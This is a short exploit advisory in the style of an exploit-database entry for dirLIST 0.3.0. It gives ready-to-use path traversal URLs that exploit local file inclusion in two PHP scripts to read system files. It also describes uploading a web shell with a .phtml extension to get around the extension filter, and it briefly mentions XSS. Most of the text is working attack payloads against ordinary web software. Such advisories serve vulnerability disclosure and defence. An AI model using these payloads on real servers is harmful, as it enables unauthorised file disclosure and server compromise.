#################################################### # Exploit Title: dirLIST v 0.3.0 Multiple Vulnerabilities # Date: 08/08/2012 # Author: L0n3ly-H34rT # Homepage: http://se3c.tk/ # Contact: l0n3ly_h34rt@hotmail.com # Software Link: http://sourceforge.net/projects/dir-list/files/latest/download # Tested on: Linux/Windows #################################################### # First : Multiple Local File Includsion : - Example 1: http://127.0.0.1/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini - Example 2: http://127.0.0.1//dirlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini # Second : Remote File Upload : In final version, some php extension is filterd but not all .. just upload shell like this : shell.phtml In .phtml extension you can run php files if httpd.conf is configure as php file if you lucky :) # Note : There some xss in different files.. # Greetz to my friendz